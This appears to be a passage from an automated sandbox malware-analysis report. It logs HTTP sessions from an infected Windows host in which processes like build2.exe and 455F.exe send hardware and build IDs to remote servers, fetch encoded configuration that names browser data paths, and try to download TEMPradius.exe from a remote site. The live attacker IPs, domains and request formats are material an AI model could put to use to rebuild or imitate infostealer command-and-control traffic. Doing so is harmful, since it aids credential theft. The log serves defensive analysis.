5	192.168.2.10	49740	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:10 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:10 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 33 31 44 35 32 39 43 45 37 32 32 35 38 33 35 38 30 30 35 38 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 42 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="hwid"5931D529CE722583580058-a33c7340-61ca-11ee-8c18-806e6f6e6963------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------
2024-04-04 15:49:11 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:11 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|c35f11599f5c5e6924b20b07a358cf4e\|1\|1\|1\|0\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49741	172.67.217.100	443	3688	C:\Users\user\AppData\Local\Temp\455F.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:11 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: resergvearyinitiani.shop
2024-04-04 15:49:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-04-04 15:49:11 UTC	810	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pd9codigqk6opehvalo11qjin0; expires=Mon, 29-Jul-2024 09:35:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j7KeQkhwnjZxMwBnRLo8wlK1fz9IrnqUJWlSHnGt6EZablXPNC30LXEuzOLqJI0imUmwX%2BFHGm7qT3UR%2BBi2pmLedfC2hFZ12%2BKYICTnml2UtirDNNBn5x5AMXkcvefrR6zCOyVamkzOFVQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f27268cd2031ce-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:11 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-04-04 15:49:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49744	172.67.217.100	443	3688	C:\Users\user\AppData\Local\Temp\455F.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:12 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: resergvearyinitiani.shop
2024-04-04 15:49:12 UTC	61	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
2024-04-04 15:49:13 UTC	808	IN	HTTP/1.1 200 OK Date: Thu, 04 Apr 2024 15:49:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=769b3u5qovuojepnog49qups9r; expires=Mon, 29-Jul-2024 09:35:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRAwcFhHITEJxUVXiXC%2FzRynVATm1nQWvqytYUuecnGpgAezr3kEIfDhhXazqsGYpuY6uDs7nKj32HqBr4TpqJg6Pty2rUxhjNQ6yp8Ouw9DWUNHZWrn%2F6BEzXGFbGLp6dbn8Q5hkQP7Cxc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86f2727189a06dce-MIA alt-svc: h3=":443"; ma=86400
2024-04-04 15:49:13 UTC	561	IN	Data Raw: 32 36 30 64 0d 0a 76 6f 6d 52 2f 53 79 35 65 74 53 64 41 39 46 43 50 56 4d 57 66 42 2b 37 42 78 48 43 47 4f 72 6d 65 62 31 67 4a 56 4d 6e 52 57 37 46 68 4a 76 64 44 4a 6c 61 39 75 73 68 36 32 49 4a 66 78 74 32 50 35 73 6e 4d 65 42 72 6a 38 52 44 6e 52 52 58 4a 6b 4a 70 59 37 53 70 73 64 30 4d 6d 78 75 77 76 7a 6e 78 4a 46 77 2f 5a 52 6b 7a 74 67 30 78 34 6a 6a 4b 78 42 7a 46 51 68 39 7a 66 45 68 6b 6e 71 6d 78 33 51 79 5a 41 64 6d 58 49 2f 46 69 48 58 4d 32 58 44 2b 5a 59 6e 2f 67 49 73 72 45 48 4e 63 43 52 44 39 46 4a 41 58 52 2b 66 32 65 52 4e 55 64 76 50 68 67 74 53 4e 52 50 6e 4d 5a 65 74 70 74 66 36 74 31 67 6f 74 62 6b 57 30 76 63 77 64 6c 54 70 36 70 73 64 30 4f 33 41 44 32 70 79 50 7a 44 31 67 6e 64 7a 46 2b 79 47 77 7a 7a 78 4c 4b 78 6c 6d 64 51 Data Ascii: 260dvomR/Sy5etSdA9FCPVMWfB+7BxHCGOrmeb1gJVMnRW7FhJvdDJla9ush62IJfxt2P5snMeBrj8RDnRRXJkJpY7Spsd0MmxuwvznxJFw/ZRkztg0x4jjKxBzFQh9zfEhknqmx3QyZAdmXI/FiHXM2XD+ZYn/gIsrEHNcCRD9FJAXR+f2eRNUdvPhgtSNRPnMZetptf6t1gotbkW0vcwdlTp6psd0O3AD2pyPzD1gndzF+yGwzzxLKxlmdQ
2024-04-04 15:49:13 UTC	1369	IN	Data Raw: 66 34 2f 69 4e 54 73 6b 65 75 2f 70 7a 74 53 56 52 4f 33 63 4d 64 39 64 6a 63 4b 6c 78 67 59 45 63 32 30 49 4a 58 69 31 6c 54 70 36 70 73 64 30 4d 6d 56 69 78 35 79 48 72 59 68 38 51 65 52 56 78 30 33 4a 7a 34 42 58 67 78 6c 6d 64 51 41 56 7a 57 6d 6c 6a 74 4b 6d 78 33 51 79 5a 57 71 2b 51 43 66 46 69 48 58 4d 32 58 44 2b 62 4a 58 53 73 4f 74 44 47 57 39 73 44 51 7a 42 42 4b 51 4c 59 35 2f 57 52 51 39 51 65 76 50 39 6d 75 53 68 58 4d 48 6b 56 63 74 6c 67 66 71 52 38 68 49 55 65 6e 30 77 6f 57 51 64 6c 54 70 36 70 73 64 30 4d 6d 78 2b 75 76 7a 6e 78 59 48 45 32 64 77 77 2f 37 47 5a 39 72 6e 32 65 78 48 53 33 51 41 56 7a 42 32 56 4f 77 36 57 63 39 77 79 5a 57 76 53 39 49 36 70 50 4e 33 4d 32 58 44 2b 62 4a 7a 48 69 4f 6f 2b 49 57 34 64 41 42 7a 39 41 4b 42 Data Ascii: f4/iNTskeu/pztSVRO3cMd9djcKlxgYEc20IJXi1lTp6psd0MmVix5yHrYh8QeRVx03Jz4BXgxlmdQAVzWmljtKmx3QyZWq+QCfFiHXM2XD+bJXSsOtDGW9sDQzBBKQLY5/WRQ9QevP9muShXMHkVctlgfqR8hIUen0woWQdlTp6psd0Mmx+uvznxYHE2dww/7GZ9rn2exHS3QAVzB2VOw6Wc9wyZWvS9I6pPN3M2XD+bJzHiOo+IW4dABz9AKB
2024-04-04 15:49:13 UTC	1369	IN	Data Raw: 30 53 47 7a 57 76 53 39 49 2f 46 69 48 58 4d 30 47 57 57 5a 50 54 48 67 55 49 75 51 47 4e 56 41 63 6a 4a 4c 4b 51 76 4b 71 35 7a 33 44 4a 6c 61 39 4c 30 6a 72 47 34 77 57 54 5a 63 50 35 73 6e 4d 62 6b 56 34 4d 5a 5a 6e 55 41 46 63 77 64 6c 54 4e 76 6e 73 38 63 4d 6d 78 57 33 39 32 65 68 4c 31 49 79 65 68 42 79 33 47 70 37 6f 48 71 46 67 52 2f 55 43 55 51 38 51 54 55 47 33 4f 50 32 6e 6b 54 52 57 50 69 51 43 66 46 69 48 58 4d 32 58 44 2b 62 4a 58 53 34 4f 74 44 47 57 2b 34 56 54 48 4e 77 4a 41 4c 53 37 4f 58 66 49 62 4e 61 39 4c 30 6a 38 57 4a 41 66 78 74 32 50 35 73 6e 4d 65 49 34 6b 65 74 7a 6e 55 41 46 63 77 64 6c 54 70 36 72 39 4a 4d 4f 67 31 72 32 38 6d 6d 32 4a 56 41 77 66 68 42 34 30 32 6c 37 72 6e 6d 61 69 78 2f 66 44 6b 38 37 53 43 6b 49 31 4f 4c Data Ascii: 0SGzWvS9I/FiHXM0GWWZPTHgUIuQGNVAcjJLKQvKq5z3DJla9L0jrG4wWTZcP5snMbkV4MZZnUAFcwdlTNvns8cMmxW392ehL1IyehBy3Gp7oHqFgR/UCUQ8QTUG3OP2nkTRWPiQCfFiHXM2XD+bJXS4OtDGW+4VTHNwJALS7OXfIbNa9L0j8WJAfxt2P5snMeI4ketznUAFcwdlTp6r9JMOg1r28mm2JVAwfhB402l7rnmaix/fDk87SCkI1OL
2024-04-04 15:49:13 UTC	1369	IN	Data Raw: 31 72 30 76 53 50 78 59 68 31 7a 4e 42 6c 78 6d 54 30 78 34 48 6d 4d 68 42 72 66 43 6c 55 78 56 79 4d 50 32 75 58 36 6b 45 54 55 47 62 6a 31 61 4c 51 6e 55 6a 64 37 48 58 4c 59 59 58 32 68 4f 73 62 72 63 35 31 41 42 58 4d 48 5a 55 36 65 71 2f 53 48 44 6f 4e 61 39 74 42 69 70 53 6f 66 58 68 78 63 50 35 73 6e 4d 65 4a 6c 78 75 74 7a 6e 55 41 46 63 77 64 6c 46 62 4f 44 73 64 30 4d 6d 56 72 30 76 53 50 7a 4a 31 4e 78 4c 46 77 39 30 32 6c 33 6f 33 61 42 69 42 62 65 42 6b 41 38 51 53 63 4b 32 75 37 79 6c 45 62 58 46 37 7a 7a 5a 62 38 70 57 54 31 33 48 58 75 5a 4b 78 7a 49 4f 4d 72 47 57 5a 31 41 42 58 4d 46 49 42 53 63 73 37 48 66 62 39 59 54 75 76 39 69 6f 69 63 66 58 68 78 63 50 35 73 6e 4d 65 4a 6c 78 75 74 7a 6e 55 41 46 63 77 64 6c 46 62 4f 44 73 64 30 4d Data Ascii: 1r0vSPxYh1zNBlxmT0x4HmMhBrfClUxVyMP2uX6kETUGbj1aLQnUjd7HXLYYX2hOsbrc51ABXMHZU6eq/SHDoNa9tBipSofXhxcP5snMeJlxutznUAFcwdlFbODsd0MmVr0vSPzJ1NxLFw902l3o3aBiBbeBkA8QScK2u7ylEbXF7zzZb8pWT13HXuZKxzIOMrGWZ1ABXMFIBScs7Hfb9YTuv9ioicfXhxcP5snMeJlxutznUAFcwdlFbODsd0M
2024-04-04 15:49:13 UTC	1369	IN	Data Raw: 63 6a 38 57 49 64 63 7a 59 48 45 72 45 6e 4d 65 49 34 79 73 5a 5a 6e 55 4a 41 50 51 56 2f 54 70 7a 6e 2b 70 6c 49 33 68 53 33 2b 57 6d 32 4b 46 73 77 63 68 68 2b 31 6d 46 32 6f 58 57 4d 69 42 58 56 41 30 59 39 54 69 67 48 32 61 75 39 38 43 61 5a 57 76 53 39 49 2f 46 69 48 58 46 7a 42 6a 32 42 4a 7a 4f 52 65 5a 36 54 43 39 4e 43 4b 46 6b 48 5a 55 36 65 71 62 47 41 41 4c 52 77 39 4c 30 6a 38 57 49 64 4b 42 74 32 50 35 73 6e 4d 65 49 34 79 73 5a 62 32 41 34 48 61 51 64 6e 44 63 37 68 2b 5a 46 4c 31 42 32 31 38 47 61 2b 4a 6c 4d 37 66 52 5a 37 31 6d 78 68 6f 33 61 47 67 78 58 54 44 45 6f 37 52 69 70 4d 6b 6f 53 62 33 51 79 5a 57 76 53 39 49 2f 46 67 57 43 6b 30 52 6a 2b 5a 53 58 53 74 56 49 4f 49 48 4a 39 74 4c 33 4d 48 5a 55 36 65 71 65 7a 52 49 62 4e 61 39 Data Ascii: cj8WIdczYHErEnMeI4ysZZnUJAPQV/Tpzn+plI3hS3+Wm2KFswchh+1mF2oXWMiBXVA0Y9TigH2au98CaZWvS9I/FiHXFzBj2BJzOReZ6TC9NCKFkHZU6eqbGAALRw9L0j8WIdKBt2P5snMeI4ysZb2A4HaQdnDc7h+ZFL1B218Ga+JlM7fRZ71mxho3aGgxXTDEo7RipMkoSb3QyZWvS9I/FgWCk0Rj+ZSXStVIOIHJ9tL3MHZU6eqezRIbNa9
2024-04-04 15:49:13 UTC	1369	IN	Data Raw: 69 48 58 4d 32 58 44 2b 62 4a 7a 4f 6e 64 73 6a 63 57 5a 38 47 54 54 46 49 4c 51 66 54 36 50 53 52 54 74 59 53 70 50 64 68 73 79 35 5a 4d 48 67 62 66 4e 56 6d 59 61 78 38 68 59 49 54 7a 55 49 4a 58 69 31 6c 54 70 36 70 73 64 30 4d 6d 56 69 78 35 79 48 72 59 68 38 52 66 78 4a 2b 31 57 52 30 6c 58 6d 47 69 68 7a 4a 51 69 68 5a 42 32 56 4f 6e 71 6d 78 67 41 43 77 64 39 36 55 49 2f 45 35 4d 46 6b 32 58 44 2b 62 4a 7a 48 69 4f 4d 69 44 46 35 39 61 42 58 46 49 4b 77 62 52 37 76 65 58 53 64 67 5a 75 76 74 73 76 69 52 57 4e 58 45 4d 62 39 39 72 63 36 39 30 68 34 67 4a 30 51 64 48 50 51 56 70 59 37 53 70 73 64 30 4d 6d 56 72 30 76 53 47 30 4f 42 39 70 4e 6c 35 4d 7a 6d 55 7a 7a 78 4c 4b 78 6c 6d 64 51 41 55 75 43 30 78 6a 74 49 53 62 39 41 79 5a 41 64 6d 58 49 2f Data Ascii: iHXM2XD+bJzOndsjcWZ8GTTFILQfT6PSRTtYSpPdhsy5ZMHgbfNVmYax8hYITzUIJXi1lTp6psd0MmVix5yHrYh8RfxJ+1WR0lXmGihzJQihZB2VOnqmxgACwd96UI/E5MFk2XD+bJzHiOMiDF59aBXFIKwbR7veXSdgZuvtsviRWNXEMb99rc690h4gJ0QdHPQVpY7Spsd0MmVr0vSG0OB9pNl5MzmUzzxLKxlmdQAUuC0xjtISb9AyZAdmXI/
2024-04-04 15:49:13 UTC	1369	IN	Data Raw: 4e 6c 35 65 7a 6e 56 2b 34 42 58 67 78 6c 6d 64 51 41 56 7a 57 6d 6c 6a 74 4b 6d 78 33 51 79 5a 57 71 2b 51 43 66 46 69 48 58 4d 32 58 44 2b 62 4a 58 53 73 4f 74 44 47 57 39 63 50 54 7a 74 42 49 41 48 62 37 66 71 4e 52 39 34 57 74 76 74 71 76 43 5a 62 4d 6e 51 4d 65 39 31 74 63 4b 31 33 68 6f 63 66 6e 30 77 6f 57 51 64 6c 54 70 36 70 73 64 30 4d 6d 78 2b 75 76 7a 6e 78 59 47 30 38 65 67 56 79 33 6e 52 35 34 42 58 67 78 6c 6d 64 51 41 56 7a 57 6d 6c 6a 74 4b 6d 78 33 51 79 5a 57 71 2b 51 43 66 46 69 48 58 4d 32 58 44 2b 62 4a 58 53 73 4f 74 44 47 57 39 73 4d 56 54 70 45 4c 41 66 53 37 50 79 61 52 4e 73 58 73 76 78 76 75 43 46 63 4f 58 6b 54 63 39 4e 73 65 71 64 32 6a 49 4e 62 6b 57 30 76 63 77 64 6c 54 70 36 70 73 64 30 4f 33 41 44 32 70 79 50 7a 43 33 34 Data Ascii: Nl5eznV+4BXgxlmdQAVzWmljtKmx3QyZWq+QCfFiHXM2XD+bJXSsOtDGW9cPTztBIAHb7fqNR94WtvtqvCZbMnQMe91tcK13hocfn0woWQdlTp6psd0Mmx+uvznxYG08egVy3nR54BXgxlmdQAVzWmljtKmx3QyZWq+QCfFiHXM2XD+bJXSsOtDGW9sMVTpELAfS7PyaRNsXsvxvuCFcOXkTc9Nseqd2jINbkW0vcwdlTp6psd0O3AD2pyPzC34
2024-04-04 15:49:13 UTC	974	IN	Data Raw: 39 42 33 4d 2b 34 56 34 4d 5a 5a 6e 55 41 46 63 77 64 6c 54 4e 76 7a 73 38 63 4d 6d 7a 4b 74 2f 6d 79 2f 59 6e 45 36 59 68 6b 2f 2b 47 74 34 70 33 61 65 78 48 53 33 51 41 56 7a 42 32 56 4f 77 36 57 63 39 77 79 5a 57 76 53 39 49 36 70 50 4e 33 4d 32 58 44 2b 62 4a 7a 48 69 4f 6f 2b 49 57 34 64 41 42 7a 68 4c 4b 77 2f 62 34 2f 75 61 54 74 41 59 75 66 56 76 74 44 4a 56 50 58 34 4d 63 74 70 6f 64 36 31 77 6a 59 30 4a 32 67 74 42 63 51 74 49 5a 4a 36 70 73 64 30 4d 6d 56 72 30 76 32 61 72 59 41 64 7a 4e 43 5a 32 31 31 64 77 75 7a 72 6e 37 46 6d 64 51 41 56 7a 42 7a 68 43 73 34 4f 78 33 51 79 5a 57 76 54 6d 44 74 74 69 48 58 4d 32 58 44 2b 62 4a 7a 4f 6e 64 73 6a 63 57 5a 38 42 51 44 4a 45 4c 51 58 51 35 50 53 62 58 4e 45 66 70 50 35 67 75 43 31 54 4d 58 6b 54 Data Ascii: 9B3M+4V4MZZnUAFcwdlTNvzs8cMmzKt/my/YnE6Yhk/+Gt4p3aexHS3QAVzB2VOw6Wc9wyZWvS9I6pPN3M2XD+bJzHiOo+IW4dABzhLKw/b4/uaTtAYufVvtDJVPX4Mctpod61wjY0J2gtBcQtIZJ6psd0MmVr0v2arYAdzNCZ211dwuzrn7FmdQAVzBzhCs4Ox3QyZWvTmDttiHXM2XD+bJzOndsjcWZ8BQDJELQXQ5PSbXNEfpP5guC1TMXkT
2024-04-04 15:49:13 UTC	1369	IN	Data Raw: 32 36 30 62 0d 0a 37 6b 71 55 54 46 7a 44 48 76 51 5a 58 43 79 65 59 36 4d 48 64 4d 4f 53 6a 6c 4d 4a 77 6e 58 35 76 69 53 53 4e 73 54 74 37 38 76 33 45 67 30 57 6a 51 5a 5a 5a 6b 39 4d 65 42 4c 68 59 6f 66 30 51 46 58 4e 67 56 49 5a 4c 65 70 73 59 41 41 74 48 44 64 76 53 4f 71 54 7a 64 61 48 31 35 36 31 53 55 72 34 6a 71 48 6a 51 6e 59 42 30 38 34 52 53 6b 46 31 65 7a 33 6e 45 2f 66 46 4c 6e 32 59 72 73 68 56 7a 35 33 48 6e 62 52 62 33 4b 75 66 38 6a 4b 64 4c 64 70 4c 48 46 43 50 30 79 45 71 62 4f 77 54 64 34 54 74 37 31 47 74 53 64 54 63 52 74 32 46 70 73 6e 62 4f 34 56 34 4f 39 5a 6e 52 73 6f 57 53 35 4d 54 4e 76 6e 73 38 63 4d 6d 78 75 79 38 57 69 38 4a 46 55 32 64 42 6c 37 32 57 31 34 72 58 47 61 67 52 58 61 41 30 63 77 53 69 73 4d 7a 75 37 39 6c 45 Data Ascii: 260b7kqUTFzDHvQZXCyeY6MHdMOSjlMJwnX5viSSNsTt78v3Eg0WjQZZZk9MeBLhYof0QFXNgVIZLepsYAAtHDdvSOqTzdaH1561SUr4jqHjQnYB084RSkF1ez3nE/fFLn2YrshVz53HnbRb3Kuf8jKdLdpLHFCP0yEqbOwTd4Tt71GtSdTcRt2FpsnbO4V4O9ZnRsoWS5MTNvns8cMmxuy8Wi8JFU2dBl72W14rXGagRXaA0cwSisMzu79lE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49747	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:13 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-04 15:49:13 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 33 35 66 31 31 35 39 39 66 35 63 35 65 36 39 32 34 62 32 30 62 30 37 61 33 35 38 63 66 34 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 66 36 39 31 37 39 33 63 38 34 34 34 35 62 33 31 39 36 30 35 32 33 36 61 34 31 61 31 65 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"c35f11599f5c5e6924b20b07a358cf4e------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="build_id"1f691793c84445b319605236a41a1e5a------JKFIDGDHJEGIEBFHDGDGCont
2024-04-04 15:49:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 04 Apr 2024 15:49:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-04 15:49:14 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49751	192.185.16.114	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:15 UTC	167	OUT	GET /TEMPradius.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: nessotechbd.com
2024-04-04 15:49:15 UTC	271	IN	HTTP/1.1 503 Service Unavailable Date: Thu, 04 Apr 2024 15:49:15 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 19 Jun 2022 19:44:22 GMT Accept-Ranges: bytes Content-Length: 744 Vary: Accept-Encoding Content-Type: text/html
2024-04-04 15:49:15 UTC	744	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>503 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noind

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49750	95.216.179.73	443	7712	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-04 15:49:15 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0 Host: 95.216.179.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
